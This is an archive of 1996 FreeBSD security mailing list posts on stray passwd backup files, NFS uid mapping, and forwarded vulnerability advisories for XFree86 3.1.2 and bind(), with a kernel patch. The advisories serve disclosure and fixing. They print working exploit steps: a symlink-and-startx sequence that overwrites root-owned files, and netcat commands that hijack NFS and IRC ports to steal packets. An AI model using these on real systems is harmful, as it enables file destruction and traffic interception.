From owner-freebsd-security Sun Jan 28 10:07:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA24294 for security-outgoing; Sun, 28 Jan 1996 10:07:40 -0800 (PST) Received: from zap.io.org (zap.io.org [198.133.36.81]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id KAA24289 for ; Sun, 28 Jan 1996 10:07:37 -0800 (PST) Received: (from taob@localhost) by zap.io.org (8.6.12/8.6.12) id NAA29338; Sun, 28 Jan 1996 13:07:04 -0500 Date: Sun, 28 Jan 1996 13:07:03 -0500 (EST) From: Brian Tao To: FREEBSD-SECURITY-L Subject: Temporary passwd files in /etc? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org Precedence: bulk I found these two files lying around in the /etc directory of one of our FreeBSD 2.1.0-RELEASE machines here. -rw-r--r-- 1 root wheel 459403 Jan 20 15:35 pw.007939.orig -rw-rw-rw- 1 root wheel 612563 Jan 25 19:06 pw.021282~ pw.021282~ is a world readable/writeable copy of the master.passwd file. How did either of those files get there? Do the serial numbers on them look familiar to anyone (pids?). -- Brian Tao (BT300, taob@io.org) Systems Administrator, Internex Online Inc. "Though this be madness, yet there is method in't" From owner-freebsd-security Sun Jan 28 13:18:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA01705 for security-outgoing; Sun, 28 Jan 1996 13:18:20 -0800 (PST) Received: from iaehv.IAEhv.nl (root@iaehv.IAEhv.nl [192.87.208.2]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id NAA01700 for ; Sun, 28 Jan 1996 13:18:17 -0800 (PST) Received: from oasis.IAEhv.nl by iaehv.IAEhv.nl (8.6.12/1.63) id WAA07058; Sun, 28 Jan 1996 22:17:40 +0100 X-Disclaimer: iaehv.nl is a public access UNIX system and cannot be held responsible for the opinions of its individual users. Received: by oasis.IAEhv.nl (8.6.12/1.63) id WAA00571; Sun, 28 Jan 1996 22:16:19 +0100 From: volf@oasis.IAEhv.nl (Frank Volf) Message-Id: <199601282116.WAA00571@oasis.IAEhv.nl> Subject: Re: Temporary passwd files in /etc? To: taob@io.org (Brian Tao) Date: Sun, 28 Jan 1996 22:16:18 +0100 (MET) Cc: freebsd-security@freebsd.org In-Reply-To: from "Brian Tao" at Jan 28, 96 01:07:03 pm X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: owner-security@freebsd.org Precedence: bulk Brian Tao wrote: > > I found these two files lying around in the /etc directory of one > of our FreeBSD 2.1.0-RELEASE machines here. > > -rw-r--r-- 1 root wheel 459403 Jan 20 15:35 pw.007939.orig > -rw-rw-rw- 1 root wheel 612563 Jan 25 19:06 pw.021282~ > > pw.021282~ is a world readable/writeable copy of the master.passwd > file. How did either of those files get there? Do the serial numbers > on them look familiar to anyone (pids?). Hi, We had a similar problem. These files are backup files created by the the joe editor. There is a bug in some versions of this editor, that creates the backup files with the wrong permissions. We solved the problem by installing version 2.8 of joe. This, however does not prevent creating the backup files, they just have the correct permissions. If you don't want these files at all, you need to turn off the backup option of joe for root. Regards, Frank ---------------------------------------------------------------------------- Frank Volf - Internet Access Eindhoven - Digitale Stad Eindhoven ---------------------------------------------------------------------------- || volf@oasis.IAEhv.nl - use for personal mail || || volf@IAEhv.nl - use for Internet Access Eindhoven related mail || || volf@dse.dse.nl - use for Digital City of Eindhoven related mail || ---------------------------------------------------------------------------- IAE Public Access Unix System - Dial +31.40.2439436 and login as new. ---------------------------------------------------------------------------- From owner-freebsd-security Sun Jan 28 13:38:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA02789 for security-outgoing; Sun, 28 Jan 1996 13:38:11 -0800 (PST) Received: from ibp.ibp.fr (ibp.ibp.fr [132.227.60.30]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id NAA02779 for ; Sun, 28 Jan 1996 13:38:07 -0800 (PST) Received: from blaise.ibp.fr (blaise.ibp.fr [132.227.60.1]) by ibp.ibp.fr (8.6.12/jtpda-5.0) with ESMTP id WAA29947 ; Sun, 28 Jan 1996 22:37:57 +0100 Received: from (uucp@localhost) by blaise.ibp.fr (8.6.12/jtpda-5.0) with UUCP id WAA11977 ; Sun, 28 Jan 1996 22:37:30 +0100 Received: (from roberto@localhost) by keltia.freenix.fr (8.7.3/keltia-uucp-2.7) id WAA18393; Sun, 28 Jan 1996 22:15:41 +0100 (MET) From: Ollivier Robert Message-Id: <199601282115.WAA18393@keltia.freenix.fr> Subject: Re: Temporary passwd files in /etc? To: taob@io.org (Brian Tao) Date: Sun, 28 Jan 1996 22:15:40 +0100 (MET) Cc: freebsd-security@freebsd.org In-Reply-To: from "Brian Tao" at "Jan 28, 96 01:07:03 pm" X-Operating-System: FreeBSD 2.2-CURRENT ctm#1586 X-Mailer: ELM [version 2.4ME+ PL3 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org Precedence: bulk It seems that Brian Tao said: > -rw-rw-rw- 1 root wheel 612563 Jan 25 19:06 pw.021282~ > pw.021282~ is a world readable/writeable copy of the master.passwd > file. How did either of those files get there? Do the serial numbers > on them look familiar to anyone (pids?). Yes, you're using vipw with EDITOR/VISUAL=emacs and you have a umask problem. It should not be 666. I have a cron job that wipe them every day but they're always 600 ! -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.frmug.fr.net FreeBSD keltia.freenix.fr 2.2-CURRENT #1: Sun Jan 14 20:23:45 MET 1996 From owner-freebsd-security Sun Jan 28 15:03:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id PAA08881 for security-outgoing; Sun, 28 Jan 1996 15:03:29 -0800 (PST) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id PAA08871 for ; Sun, 28 Jan 1996 15:03:20 -0800 (PST) Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id JAA08301; Mon, 29 Jan 1996 09:45:30 +1030 From: Michael Smith Message-Id: <199601282315.JAA08301@genesis.atrad.adelaide.edu.au> Subject: Re: Temporary passwd files in /etc? To: taob@io.org (Brian Tao) Date: Mon, 29 Jan 1996 09:45:29 +1030 (CST) Cc: freebsd-security@freebsd.org In-Reply-To: from "Brian Tao" at Jan 28, 96 01:07:03 pm MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org Precedence: bulk Brian Tao stands accused of saying: > > I found these two files lying around in the /etc directory of one > of our FreeBSD 2.1.0-RELEASE machines here. > > -rw-r--r-- 1 root wheel 459403 Jan 20 15:35 pw.007939.orig > -rw-rw-rw- 1 root wheel 612563 Jan 25 19:06 pw.021282~ > > pw.021282~ is a world readable/writeable copy of the master.passwd > file. How did either of those files get there? Do the serial numbers > on them look familiar to anyone (pids?). The second is probably an emacs backup file. It looks like root has emacs as its editor, or someone su'd to root and root's .cshrc doesn't override EDITOR, and also has a really bogus umask setting. This is a _really_good_ reason not to ever use emacs as root's editor. The former; hmm. .orig is a patch(1) thing; have you used diff/patch to pass changes to your password database around? > Brian Tao (BT300, taob@io.org) -- ]] Mike Smith, Software Engineer msmith@atrad.adelaide.edu.au [[ ]] Genesis Software genesis@atrad.adelaide.edu.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control (ph/fax) +61-8-267-3039 [[ ]] "wherever you go, there you are" - Buckaroo Banzai [[ From owner-freebsd-security Sun Jan 28 23:00:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id XAA09455 for security-outgoing; Sun, 28 Jan 1996 23:00:40 -0800 (PST) Received: from statler.csc.calpoly.edu (statler-srv.csc.calpoly.edu [129.65.241.4]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id XAA09449 for ; Sun, 28 Jan 1996 23:00:37 -0800 (PST) Received: (from nlawson@localhost) by statler.csc.calpoly.edu (8.6.12/N8) id XAA04062; Sun, 28 Jan 1996 23:00:32 -0800 From: Nathan Lawson Message-Id: <199601290700.XAA04062@statler.csc.calpoly.edu> Subject: Re: Ownership of files/tcp_wrappers port To: wam@fedex.com (William McVey) Date: Sun, 28 Jan 1996 23:00:32 -0800 (PST) Cc: security@freebsd.org In-Reply-To: <199601261956.AA03214@gateway.fedex.com> from "William McVey" at Jan 26, 96 01:58:36 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org Precedence: bulk > Paul Richards wrote: > >guys, these are NFS problems. If you want to stop people su'ing to bin > >then map bin to nobody as well. > > I am at a lost as to why we'd want to build band-aids to gloss over > a problem, rather than the problem itself. It has been mentioned > before that UNIX was designed to have a single well protected > administrative id (root). Why would we want multiple accounts that > now need to have an equivalent amount of protection? You suggest > that we should fix the NFS to treat 'bin' special as well as root. One small problem here that no one has mentioned uet: NFS works by uid, not by account name. Therefore, we'd have to remap uid 1 (bin on most systems), uid 3, (bin on SunOS) or who knows how many other uids? Once you find yourself doing that, you might as well write your own Unix. Let's fix the cause, not patch the symptoms. -Nate From owner-freebsd-security Mon Jan 29 11:45:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA25550 for security-outgoing; Mon, 29 Jan 1996 11:45:06 -0800 (PST) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id LAA25510 for ; Mon, 29 Jan 1996 11:44:45 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.7.3/8.6.10) with SMTP id LAA11338 for freebsd-security@freebsd.org; Mon, 29 Jan 1996 11:44:35 -0800 (PST) From: Cy Schubert - BCSC Open Systems Group Message-Id: <199601291944.LAA11338@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: Host localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@orca.gov.bc.ca X-Mailer: DXmail To: freebsd-security@freebsd.org Subject: XFree86 3.1.2 Security Problems Date: Mon, 29 Jan 96 11:44:35 -0800 X-Mts: smtp Sender: owner-security@freebsd.org Precedence: bulk I just recieved this from another security news group. I haven't had a chance to verify this under FreeBSD (at home), however I have no reason to believe that this wouldn't affect FreeBSD as well. Would anyone be willing to comment on this? Regards, Phone: (604)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET BC Systems Corp. Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." ------- Forwarded Message There are security holes in XFree86 3.1.2, which installs its servers as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files, it does not take proper precautions to ensure that file permissions are maintained, resulting in the ability to overwrite files, and to read limited portions of other files. The first problem stems from the server opening a temporary file, /tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this file a symlink, the server will overwrite the original file, and then write to it its current pid. Other problems exist in the server relating to similar problems, one such example is the ability to specify an arbitrary file for the XF86config file which will then be opened, and the first line that fails to match the expected format will be output with an error, allowing a line to be read from an arbitrary file. Program: XFree86 3.1.2 servers Affected Operating Systems: All systems with XFree86 3.1.2 installed Requirements: account on system Temporary Patch: chmod o-x /usr/X11R6/bin/XF86* Security Compromise: overwrite arbitrary files Author: Dave M. (davem@cmu.edu) Synopsis: While running suid root, XFree86 servers do not properly check file permissions, allowing a user to overwrite arbitrary files on a system. Exploit: $ ls -l /var/adm/wtmp - -rw-r--r-- 1 root root 174104 Dec 30 08:31 /var/adm/wtmp $ ln -s /var/adm/wtmp /tmp/.tX0-lock $ startx (At this point exit X if it started, or else ignore any error messages) $ ls -l /var/adm/wtmp - -r--r--r-- 1 root root 11 Dec 30 08:33 /var/adm/wtmp /-------------\ |David Meltzer| |davem@cmu.edu| /--------------------------\ |School of Computer Science| |Carnegie Mellon University| \--------------------------/ ------- End of Forwarded Message From owner-freebsd-security Mon Jan 29 16:34:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA27743 for security-outgoing; Mon, 29 Jan 1996 16:34:23 -0800 (PST) Received: from zap.io.org (zap.io.org [198.133.36.81]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id QAA27702 for ; Mon, 29 Jan 1996 16:34:10 -0800 (PST) Received: (from taob@localhost) by zap.io.org (8.6.12/8.6.12) id TAA21938; Mon, 29 Jan 1996 19:33:23 -0500 Date: Mon, 29 Jan 1996 19:33:23 -0500 (EST) From: Brian Tao To: freebsd-security@freebsd.org Subject: Re: Temporary passwd files in /etc? In-Reply-To: <199601282315.JAA08301@genesis.atrad.adelaide.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org Precedence: bulk On Mon, 29 Jan 1996, Michael Smith wrote: > > The second is probably an emacs backup file. It looks like root has > emacs as its editor, or someone su'd to root and root's .cshrc doesn't > override EDITOR, and also has a really bogus umask setting. This is a > _really_good_ reason not to ever use emacs as root's editor. It turns out that our programmer was testing out a perl-based passwd file massager that created a temporary file with a ~ at the end (he is an emacs user). He had inadvertently set his umask in the perl script to (umask() & 700) rather than 077, and that's how it ended up mode 666. > The former; hmm. .orig is a patch(1) thing; have you used diff/patch to > pass changes to your password database around? I don't know about this one. It was created before the perl script was in use and thankfully did not contain a copy of the encrypted passwords. Thanks to all who mailed back suggestions about the origins of the passwd files. -- Brian Tao (BT300, taob@io.org) Systems Administrator, Internex Online Inc. "Though this be madness, yet there is method in't" From owner-freebsd-security Wed Jan 31 00:27:00 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id AAA00609 for security-outgoing; Wed, 31 Jan 1996 00:27:00 -0800 (PST) Received: from relay.philips.nl (ns.philips.nl [130.144.65.1]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id AAA00601 for ; Wed, 31 Jan 1996 00:26:50 -0800 (PST) Received: (from smap@localhost) by relay.philips.nl (8.6.9/8.6.9-950414) id JAA20152 for ; Wed, 31 Jan 1996 09:26:17 +0100 Received: from unknown(192.26.173.32) by ns.philips.nl via smap (V1.3+ESMTP) with ESMTP id sma019888; Wed Jan 31 09:24:01 1996 Received: from spooky.lss.cp.philips.com (spooky.lss.cp.philips.com [130.144.199.105]) by smtp.nl.cis.philips.com (8.6.10/8.6.10-0.9z-02May95) with ESMTP id JAA18522 for ; Wed, 31 Jan 1996 09:24:42 +0100 Received: (from guido@localhost) by spooky.lss.cp.philips.com (8.6.10/8.6.10-0.991c-08Nov95) id JAA20374 for freebsd-security@freebsd.org; Wed, 31 Jan 1996 09:23:51 +0100 Received: from smtp.nl.cis.philips.com (ns.nl.cis.philips.com [192.26.173.32]) by spooky.lss.cp.philips.com (8.6.10/8.6.10-0.991c-08Nov95) with ESMTP id AAA10125 for ; Wed, 31 Jan 1996 00:15:56 +0100 Received: from relay.philips.nl ([130.144.65.129]) by smtp.nl.cis.philips.com (8.6.10/8.6.10-0.9z-02May95) with ESMTP id AAA00701 for ; Wed, 31 Jan 1996 00:16:45 +0100 Received: (from smap@localhost) by relay.philips.nl (8.6.9/8.6.9-950414) id AAA24703 for ; Wed, 31 Jan 1996 00:15:54 +0100 Received: from sydney2.world.net(198.142.12.2) by ns.philips.nl via smap (V1.3+ESMTP) with ESMTP id sma024680; Wed Jan 31 00:15:32 1996 Received: from suburbia.net (suburbia.net [203.4.184.1]) by world.net (8.7.1/8.6.6) with ESMTP id KAA21447; Wed, 31 Jan 1996 10:10:25 +1100 (EST) Received: (majordom@localhost) by suburbia.net (8.7.3/Proff-950810) id KAA18813 for best-of-security-outgoing; Wed, 31 Jan 1996 10:01:41 +1100 X-Authentication-Warning: suburbia.net: majordom set sender to owner-best-of-security using -f Received: from world.net (sydney2.world.net [198.142.12.2]) by suburbia.net (8.7.3/Proff-950810) with ESMTP id KAA18805 for ; Wed, 31 Jan 1996 10:01:35 +1100 Received: from underground.org (underground.org [205.164.71.100]) by world.net (8.7.1/8.6.6) with ESMTP id KAA15135 for ; Wed, 31 Jan 1996 10:01:03 +1100 (EST) Received: (from aleph1@localhost) by underground.org (8.7.1/8.7.1) id PAA04830; Tue, 30 Jan 1996 15:18:22 -0800 Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST) From: "Aleph's K-Rad GECOS Field" To: linux-security@tarsier.cv.nrao.edu cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com, best-of-security@suburbia.net Subject: BoS: bind() Security Problems Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Reply-To: nobody@mail.uu.net Sender: owner-security@FreeBSD.ORG Precedence: bulk System Call: bind() Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix Probably others. Requirement: account on system. Security Compromise: Stealing packets from nfsd, yppasswd, ircd, etc. Credits: *Hobbit* bitblt Aleph One Synopsis: bind() does not properly check to make sure there is not a socket already bound to INADDR_ANY on the same port when binding to a specific address. On most systems, a combination of setting the SO_REUSEADDR socket option, and a call to bind() allows any process to bind to a port to which a previous process has bound width INADDR_ANY. This allows a user to bind to the specific address of a server bound to INADDR_ANY on an unprivileged port, and steal its udp packets/tcp connection. Exploit: Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz Make sure an nfs server is running: w00p% netstat -a | grep 2049 udp 0 0 *.2049 *.* LISTEN Run netcat: w00p% nc -v -v -u -s 192.88.209.5 -p 2049 listening on [192.88.209.5] 2049 ... Wait for packets to arrive. Fix: Linux: A patch was been sent to Linus and Alan Cox. It should be included with 1.3.60. My original patch (included bellow) allows for binds from the same uid, as some virtual hosting software like modified httpds, and ftpds, may break otherwise. Alan didnt like this, so all bind to the same port will not be allowed in newer kernels. You should be able to easily adapt this patch or Alan's patch to 1.2.13 without much trouble. Others: Pray to your vendors. --- begin patch --- diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c --- linux-1.3.57/net/ipv4/af_inet.c Mon Dec 25 20:03:01 1995 +++ linux/net/ipv4/af_inet.c Tue Jan 16 19:46:28 1996 @@ -46,6 +46,8 @@ * Germano Caronni : Assorted small races. * Alan Cox : sendmsg/recvmsg basic support. * Alan Cox : Only sendmsg/recvmsg now supported. + * Aleph One : Rogue processes could steal packets + * from processes bound to INADDR_ANY. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License @@ -899,6 +901,12 @@ if (sk2->num != snum) continue; /* more than one */ + if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) && + current->euid != sk2->socket->inode->i_uid) + { + sti(); + return(-EADDRINUSE); + } if (sk2->rcv_saddr != sk->rcv_saddr) continue; /* socket per slot ! -FB */ if (!sk2->reuse || sk2->state==TCP_LISTEN) Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From owner-freebsd-security Wed Jan 31 10:55:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA29244 for security-outgoing; Wed, 31 Jan 1996 10:55:03 -0800 (PST) Received: from puli.cisco.com (puli.cisco.com [171.69.1.174]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id KAA29238 Wed, 31 Jan 1996 10:55:01 -0800 (PST) Received: from localhost.cisco.com (localhost.cisco.com [127.0.0.1]) by puli.cisco.com (8.6.8+c/8.6.5) with SMTP id KAA05100; Wed, 31 Jan 1996 10:54:27 -0800 Message-Id: <199601311854.KAA05100@puli.cisco.com> To: security@freebsd.org, wollman@freebsd.org Subject: [cisco.external.bugtraq] Re: BoS: bind() Security Problems Date: Wed, 31 Jan 1996 10:54:27 -0800 From: Paul Traina Sender: owner-security@freebsd.org Precedence: bulk Yuck, I hate to think of what we're going to break when we fix this, but we should definitely fix this, otherwise users can hose NFS & friends. Paul p.s. I haven't looked at our code yet to verify this bug. ------- Forwarded Message From: Bernd.Lehle@rus.uni-stuttgart.de (Bernd Lehle) To: Multiple recipients of list BUGTRAQ Newsgroups: cisco.external.bugtraq Subject: Re: BoS: bind() Security Problems Date: 31 Jan 1996 04:18:29 PST Organization: Internet-USENET Gateway at cisco Systems MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit > > > System Call: bind() > Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix > Probably others. > Requirement: account on system. > Security Compromise: Stealing packets from > nfsd, yppasswd, ircd, etc. > Credits: *Hobbit* > bitblt > Aleph One > Synopsis: bind() does not properly check > to make sure there is not a socket > already bound to INADDR_ANY on the same > port when binding to a specific address. > IRIX 5.3 is vulnerable, too. > Exploit: [..] > Run netcat: > > w00p% nc -v -v -u -s 192.88.209.5 -p 2049 > listening on [192.88.209.5] 2049 ... To take a look at irc packets: nc -v -v -l -s Your.IP.Adress -p 6667 -- > Bernd Lehle - Stuttgart University Computer Center * A supercomputer < > Visualization / SFB 382 / Astrophysics * is a machine < > lehle@rus.uni-stuttgart.de Tel:+49-711-685-5531 * that runs an < > http://www.tat.physik.uni-tuebingen.de/~lehle * endless loop < > pgp? -> finger bernd@visbl.rus.uni-stuttgart.de * in 2 seconds < ------- End of Forwarded Message From owner-freebsd-security Wed Jan 31 11:30:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA02619 for security-outgoing; Wed, 31 Jan 1996 11:30:25 -0800 (PST) Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id LAA02604 for ; Wed, 31 Jan 1996 11:30:19 -0800 (PST) Received: by halloran-eldar.lcs.mit.edu; (5.65/1.1.8.2/19Aug95-0530PM) id AA00772; Wed, 31 Jan 1996 14:30:09 -0500 Date: Wed, 31 Jan 1996 14:30:09 -0500 From: "Garrett A. Wollman" Message-Id: <9601311930.AA00772@halloran-eldar.lcs.mit.edu> To: Paul Traina Cc: security@freebsd.org Subject: [cisco.external.bugtraq] Re: BoS: bind() Security Problems In-Reply-To: <199601311854.KAA05100@puli.cisco.com> References: <199601311854.KAA05100@puli.cisco.com> Sender: owner-security@freebsd.org Precedence: bulk < said: > Yuck, I hate to think of what we're going to break when we fix this, but > we should definitely fix this, otherwise users can hose NFS & friends. Lots of stuff will get broken. Although, it occurs to me... It should be possible to require that SO_REUSEPORT be specified on both the original and the duplicate sockets. This way, those programs (like ALL UDP-based servers) for which this is a requirement will still be able to work with a minimum of modification. We can't, however, require any modifications where multicast addresses are involved. -GAWollman -- Garrett A. Wollman | Shashish is simple, it's discreet, it's brief. ... wollman@lcs.mit.edu | Shashish is the bonding of hearts in spite of distance. Opinions not those of| It is a bond more powerful than absence. We like people MIT, LCS, ANA, or NSA| who like Shashish. - Claude McKenzie + Florent Vollant From owner-freebsd-security Wed Jan 31 12:09:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA05537 for security-outgoing; Wed, 31 Jan 1996 12:09:13 -0800 (PST) Received: from mail.vividnet.com (mail.vividnet.com [206.149.144.3]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id MAA04816 for ; Wed, 31 Jan 1996 12:04:24 -0800 (PST) Received: from aquarius.vividnet.com (postmaster@mail.vividnet.com) by mail.vividnet.com (8.6.12/8.6.9) with ESMTP id MAA00900 for ; Wed, 31 Jan 1996 12:02:30 -0800 Received: (postmaster@aquarius.vividnet.com) by aquarius.vividnet.com (8.6.12/8.6.9) id MAA01816; Wed, 31 Jan 1996 12:02:09 -0800 Date: Wed, 31 Jan 1996 12:02:09 -0800 (PST) From: Brian Wang To: freebsd-security@freebsd.org Subject: BoS: bind() Security Problems (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org Precedence: bulk I tried to exploit the following security hole on my nfs-server running FreeBSD2.1, but I'm not getting the expected exploit-results. Does this mean FreeBSD is safe (following msg suggested the opposite)? ---------- Forwarded message ---------- Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST) From: Aleph's K-Rad GECOS Field To: linux-security@tarsier.cv.nrao.edu Cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com, best-of-security@suburbia.net Subject: BoS: bind() Security Problems System Call: bind() Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix Probably others. Requirement: account on system. Security Compromise: Stealing packets from nfsd, yppasswd, ircd, etc. Credits: *Hobbit* bitblt Aleph One Synopsis: bind() does not properly check to make sure there is not a socket already bound to INADDR_ANY on the same port when binding to a specific address. On most systems, a combination of setting the SO_REUSEADDR socket option, and a call to bind() allows any process to bind to a port to which a previous process has bound width INADDR_ANY. This allows a user to bind to the specific address of a server bound to INADDR_ANY on an unprivileged port, and steal its udp packets/tcp connection. Exploit: Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz Make sure an nfs server is running: w00p% netstat -a | grep 2049 udp 0 0 *.2049 *.* LISTEN Run netcat: w00p% nc -v -v -u -s 192.88.209.5 -p 2049 listening on [192.88.209.5] 2049 ... Wait for packets to arrive. Fix: Linux: A patch was been sent to Linus and Alan Cox. It should be included with 1.3.60. My original patch (included bellow) allows for binds from the same uid, as some virtual hosting software like modified httpds, and ftpds, may break otherwise. Alan didnt like this, so all bind to the same port will not be allowed in newer kernels. You should be able to easily adapt this patch or Alan's patch to 1.2.13 without much trouble. Others: Pray to your vendors. --- begin patch --- diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c --- linux-1.3.57/net/ipv4/af_inet.c Mon Dec 25 20:03:01 1995 +++ linux/net/ipv4/af_inet.c Tue Jan 16 19:46:28 1996 @@ -46,6 +46,8 @@ * Germano Caronni : Assorted small races. * Alan Cox : sendmsg/recvmsg basic support. * Alan Cox : Only sendmsg/recvmsg now supported. + * Aleph One : Rogue processes could steal packets + * from processes bound to INADDR_ANY. * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License @@ -899,6 +901,12 @@ if (sk2->num != snum) continue; /* more than one */ + if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) && + current->euid != sk2->socket->inode->i_uid) + { + sti(); + return(-EADDRINUSE); + } if (sk2->rcv_saddr != sk->rcv_saddr) continue; /* socket per slot ! -FB */ if (!sk2->reuse || sk2->state==TCP_LISTEN) Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From owner-freebsd-security Wed Jan 31 12:33:08 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA07558 for security-outgoing; Wed, 31 Jan 1996 12:33:08 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id MAA07553 for ; Wed, 31 Jan 1996 12:33:06 -0800 (PST) Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <15055(6)>; Wed, 31 Jan 1996 12:32:31 PST Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177479>; Wed, 31 Jan 1996 12:32:23 -0800 X-Mailer: exmh version 1.6.4 10/10/95 To: security@freebsd.org Subject: Re: BoS: bind() Security Problems In-reply-to: Your message of "Tue, 30 Jan 1996 15:18:21 PST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 31 Jan 1996 12:32:12 PST From: Bill Fenner Message-Id: <96Jan31.123223pst.177479@crevenia.parc.xerox.com> Sender: owner-security@freebsd.org Precedence: bulk My only comment is that Alan's stronger version of the patch will break at least xntpd, which binds to each address as well as INADDR_ANY. I don't have the time right now to think this through any further. Bill From owner-freebsd-security Wed Jan 31 13:07:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA10741 for security-outgoing; Wed, 31 Jan 1996 13:07:36 -0800 (PST) Received: from puli.cisco.com (puli.cisco.com [171.69.1.174]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id NAA10732 for ; Wed, 31 Jan 1996 13:07:29 -0800 (PST) Received: from localhost.cisco.com (localhost.cisco.com [127.0.0.1]) by puli.cisco.com (8.6.8+c/8.6.5) with SMTP id NAA18066; Wed, 31 Jan 1996 13:05:43 -0800 Message-Id: <199601312105.NAA18066@puli.cisco.com> To: "Garrett A. Wollman" Cc: security@freebsd.org Subject: Re: [cisco.external.bugtraq] Re: BoS: bind() Security Problems In-Reply-To: Your message of "Wed, 31 Jan 1996 14:30:09 EST." <9601311930.AA00772@halloran-eldar.lcs.mit.edu> Date: Wed, 31 Jan 1996 13:05:43 -0800 From: Paul Traina Sender: owner-security@freebsd.org Precedence: bulk > Date: Wed, 31 Jan 1996 14:30:09 -0500 > From: "Garrett A. Wollman" > To: Paul Traina > Cc: security@freebsd.org > Subject: [cisco.external.bugtraq] Re: BoS: bind() Security Problems > > < said: > > > Yuck, I hate to think of what we're going to break when we fix this, but > > we should definitely fix this, otherwise users can hose NFS & friends. > > Lots of stuff will get broken. 